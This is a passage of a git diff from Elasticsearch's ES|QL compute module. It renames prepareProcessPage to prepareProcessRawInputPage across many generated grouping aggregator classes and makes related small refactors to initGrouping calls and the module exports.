index 786f0660ea06f..61be97ea70260 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIntGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIntGroupingAggregatorFunction.java
@@ -61,7 +61,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     IntBlock valuesBlock = page.getBlock(channels.get(0));
     IntVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIpGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIpGroupingAggregatorFunction.java
index 3d1137486fb75..9091409ccf160 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIpGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIpGroupingAggregatorFunction.java
@@ -63,7 +63,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BytesRefBlock valuesBlock = page.getBlock(channels.get(0));
     BytesRefVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopLongGroupingAggregatorFunction.java
index 820aa3c6c63e1..a2ee9a6235deb 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopLongGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopLongGroupingAggregatorFunction.java
@@ -62,7 +62,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     LongBlock valuesBlock = page.getBlock(channels.get(0));
     LongVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBooleanGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBooleanGroupingAggregatorFunction.java
index a928d0908eb8e..f112d1ae45635 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBooleanGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBooleanGroupingAggregatorFunction.java
@@ -55,7 +55,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BooleanBlock valuesBlock = page.getBlock(channels.get(0));
     BooleanVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBytesRefGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBytesRefGroupingAggregatorFunction.java
index 28843942b73cb..c9b689fa1c308 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBytesRefGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBytesRefGroupingAggregatorFunction.java
@@ -43,7 +43,7 @@ public ValuesBytesRefGroupingAggregatorFunction(List<Integer> channels,

   public static ValuesBytesRefGroupingAggregatorFunction create(List<Integer> channels,
       DriverContext driverContext) {
-    return new ValuesBytesRefGroupingAggregatorFunction(channels, ValuesBytesRefAggregator.initGrouping(driverContext.bigArrays()), driverContext);
+    return new ValuesBytesRefGroupingAggregatorFunction(channels, ValuesBytesRefAggregator.initGrouping(driverContext), driverContext);
   }

   public static List<IntermediateStateDesc> intermediateStateDesc() {
@@ -56,7 +56,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BytesRefBlock valuesBlock = page.getBlock(channels.get(0));
     BytesRefVector valuesVector = valuesBlock.asVector();
new ValuesDoubleGroupingAggregatorFunction(channels, ValuesDoubleAggregator.initGrouping(driverContext.bigArrays()), driverContext); + return new ValuesDoubleGroupingAggregatorFunction(channels, ValuesDoubleAggregator.initGrouping(driverContext), driverContext); } public static List intermediateStateDesc() { @@ -55,7 +55,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { DoubleBlock valuesBlock = page.getBlock(channels.get(0)); DoubleVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesFloatGroupingAggregatorFunction.java index bed9a884ccd10..865299d3d6689 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesFloatGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesFloatGroupingAggregatorFunction.java @@ -42,7 +42,7 @@ public ValuesFloatGroupingAggregatorFunction(List channels, public static ValuesFloatGroupingAggregatorFunction create(List channels, DriverContext driverContext) { - return new ValuesFloatGroupingAggregatorFunction(channels, ValuesFloatAggregator.initGrouping(driverContext.bigArrays()), driverContext); + return new ValuesFloatGroupingAggregatorFunction(channels, ValuesFloatAggregator.initGrouping(driverContext), driverContext); } public static List intermediateStateDesc() { @@ -55,7 +55,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { FloatBlock valuesBlock = page.getBlock(channels.get(0)); FloatVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesIntGroupingAggregatorFunction.java index fb801eadcf5cd..def1b78bf2de5 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesIntGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesIntGroupingAggregatorFunction.java @@ -41,7 +41,7 @@ public ValuesIntGroupingAggregatorFunction(List channels, public static ValuesIntGroupingAggregatorFunction create(List channels, DriverContext driverContext) { - return new ValuesIntGroupingAggregatorFunction(channels, ValuesIntAggregator.initGrouping(driverContext.bigArrays()), driverContext); + return new ValuesIntGroupingAggregatorFunction(channels, ValuesIntAggregator.initGrouping(driverContext), driverContext); } public static List intermediateStateDesc() { @@ -54,7 +54,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = 
valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesLongGroupingAggregatorFunction.java index 061af9fcc9213..e46d2ca276f9a 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesLongGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesLongGroupingAggregatorFunction.java @@ -42,7 +42,7 @@ public ValuesLongGroupingAggregatorFunction(List channels, public static ValuesLongGroupingAggregatorFunction create(List channels, DriverContext driverContext) { - return new ValuesLongGroupingAggregatorFunction(channels, ValuesLongAggregator.initGrouping(driverContext.bigArrays()), driverContext); + return new ValuesLongGroupingAggregatorFunction(channels, ValuesLongAggregator.initGrouping(driverContext), driverContext); } public static List intermediateStateDesc() { @@ -55,7 +55,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointDocValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointDocValuesGroupingAggregatorFunction.java index a959f808e438b..6d08c50e4d1b7 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointDocValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointDocValuesGroupingAggregatorFunction.java @@ -65,7 +65,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointSourceValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointSourceValuesGroupingAggregatorFunction.java index a3593b8152dd7..c5bf41c7b7dd5 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointSourceValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointSourceValuesGroupingAggregatorFunction.java @@ -68,7 +68,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page 
page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointDocValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointDocValuesGroupingAggregatorFunction.java index 77a959e654862..2d8377c7fa787 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointDocValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointDocValuesGroupingAggregatorFunction.java @@ -65,7 +65,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointSourceValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointSourceValuesGroupingAggregatorFunction.java index fc05c0932f50c..a785997ebb42a 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointSourceValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointSourceValuesGroupingAggregatorFunction.java @@ -68,7 +68,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointDocValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointDocValuesGroupingAggregatorFunction.java index 76f66cf41d569..6b048e222d1e5 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointDocValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointDocValuesGroupingAggregatorFunction.java @@ -63,7 +63,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointSourceValuesGroupingAggregatorFunction.java 
b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointSourceValuesGroupingAggregatorFunction.java index 3c1159eb0de11..25c06172d7a6b 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointSourceValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointSourceValuesGroupingAggregatorFunction.java @@ -64,7 +64,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeDocValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeDocValuesGroupingAggregatorFunction.java index 7057281c2ec6f..da45a93c21895 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeDocValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeDocValuesGroupingAggregatorFunction.java @@ -61,7 +61,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeSourceValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeSourceValuesGroupingAggregatorFunction.java index 21241efbf3198..624e1579de135 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeSourceValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeSourceValuesGroupingAggregatorFunction.java @@ -64,7 +64,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointDocValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointDocValuesGroupingAggregatorFunction.java index 387ed0abc34bb..d93a69eddae77 100644 --- 
a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointDocValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointDocValuesGroupingAggregatorFunction.java @@ -65,7 +65,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointSourceValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointSourceValuesGroupingAggregatorFunction.java index 9d9c10902ada6..0aeac922a5f52 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointSourceValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointSourceValuesGroupingAggregatorFunction.java @@ -66,7 +66,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeDocValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeDocValuesGroupingAggregatorFunction.java index 82553910e1587..4e15b9d3f83ce 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeDocValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeDocValuesGroupingAggregatorFunction.java @@ -63,7 +63,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeSourceValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeSourceValuesGroupingAggregatorFunction.java index ccab0870e206d..af6d211657696 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeSourceValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeSourceValuesGroupingAggregatorFunction.java @@ -66,7 +66,7 @@ 
public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/java/module-info.java b/x-pack/plugin/esql/compute/src/main/java/module-info.java index c4a042d692ea1..f21ed72d7eb21 100644 --- a/x-pack/plugin/esql/compute/src/main/java/module-info.java +++ b/x-pack/plugin/esql/compute/src/main/java/module-info.java @@ -36,4 +36,5 @@ exports org.elasticsearch.compute.aggregation.table; exports org.elasticsearch.compute.data.sort; exports org.elasticsearch.compute.querydsl.query; + exports org.elasticsearch.compute.lucene.read; } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/CountGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/CountGroupingAggregatorFunction.java index 611118d03872b..49562f379fd1e 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/CountGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/CountGroupingAggregatorFunction.java @@ -59,7 +59,7 @@ public int intermediateBlockCount() { } @Override - public AddInput prepareProcessPage(SeenGroupIds seenGroupIds, Page page) { + public AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { Block valuesBlock = page.getBlock(blockIndex()); if (countAll == false) { Vector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunction.java index 8b7734fe33ab7..e502638011a69 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunction.java @@ -39,13 +39,13 @@ record FilteredGroupingAggregatorFunction(GroupingAggregatorFunction next, EvalO } @Override - public AddInput prepareProcessPage(SeenGroupIds seenGroupIds, Page page) { + public AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { try (BooleanBlock filterResult = ((BooleanBlock) filter.eval(page))) { ToMask mask = filterResult.toMask(); // TODO warn on mv fields AddInput nextAdd = null; try { - nextAdd = next.prepareProcessPage(seenGroupIds, page); + nextAdd = next.prepareProcessRawInputPage(seenGroupIds, page); AddInput result = new FilteredAddInput(mask.mask(), nextAdd, page.getPositionCount()); mask = null; nextAdd = null; diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FromPartialGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FromPartialGroupingAggregatorFunction.java index 19012cabce5a1..8f6c0a8df63eb 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FromPartialGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FromPartialGroupingAggregatorFunction.java @@ 
-40,7 +40,7 @@ public FromPartialGroupingAggregatorFunction(GroupingAggregatorFunction delegate } @Override - public AddInput prepareProcessPage(SeenGroupIds seenGroupIds, Page page) { + public AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { return new AddInput() { @Override public void add(int positionOffset, IntBlock groupIds) { diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregator.java index e0d82b1f145b8..931ebcb7afe49 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregator.java @@ -66,7 +66,7 @@ public void add(int positionOffset, IntVector groupIds) { public void close() {} }; } else { - return aggregatorFunction.prepareProcessPage(seenGroupIds, page); + return aggregatorFunction.prepareProcessRawInputPage(seenGroupIds, page); } } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunction.java index 556902174f213..0de8bb9896d64 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunction.java @@ -105,13 +105,13 @@ default void add(int positionOffset, IntBlock groupIds) { } /** - * Prepare to process a single page of input. + * Prepare to process a single page of raw input. *
<p>
* This should load the input {@link Block}s and check their types and * select an optimal path and return that path as an {@link AddInput}. *
</p>
*/ - AddInput prepareProcessPage(SeenGroupIds seenGroupIds, Page page); // TODO allow returning null to opt out of the callback loop + AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page); // TODO allow returning null to opt out of the callback loop /** * Call this to signal to the aggregation that the {@code selected} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ToPartialGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ToPartialGroupingAggregatorFunction.java index e0087a0ad2340..adcee9462a0ee 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ToPartialGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ToPartialGroupingAggregatorFunction.java @@ -55,8 +55,8 @@ public ToPartialGroupingAggregatorFunction(GroupingAggregatorFunction delegate, } @Override - public AddInput prepareProcessPage(SeenGroupIds seenGroupIds, Page page) { - return delegate.prepareProcessPage(seenGroupIds, page); + public AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { + return delegate.prepareProcessRawInputPage(seenGroupIds, page); } @Override diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregators.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregators.java index 78a083b8daac7..4a2fa0923abe4 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregators.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregators.java @@ -55,7 +55,7 @@ public void add(int positionOffset, IntArrayBlock groupIds) { int valuesStart = ordinalIds.getFirstValueIndex(groupPosition + positionOffset); int valuesEnd = valuesStart + ordinalIds.getValueCount(groupPosition + positionOffset); for (int v = valuesStart; v < valuesEnd; v++) { - state.values.add(groupId, hashIds.getInt(ordinalIds.getInt(v))); + state.addValueOrdinal(groupId, hashIds.getInt(ordinalIds.getInt(v))); } } } @@ -77,7 +77,7 @@ public void add(int positionOffset, IntBigArrayBlock groupIds) { int valuesStart = ordinalIds.getFirstValueIndex(groupPosition + positionOffset); int valuesEnd = valuesStart + ordinalIds.getValueCount(groupPosition + positionOffset); for (int v = valuesStart; v < valuesEnd; v++) { - state.values.add(groupId, hashIds.getInt(ordinalIds.getInt(v))); + state.addValueOrdinal(groupId, hashIds.getInt(ordinalIds.getInt(v))); } } } @@ -93,7 +93,7 @@ public void add(int positionOffset, IntVector groupIds) { int valuesStart = ordinalIds.getFirstValueIndex(groupPosition + positionOffset); int valuesEnd = valuesStart + ordinalIds.getValueCount(groupPosition + positionOffset); for (int v = valuesStart; v < valuesEnd; v++) { - state.values.add(groupId, hashIds.getInt(ordinalIds.getInt(v))); + state.addValueOrdinal(groupId, 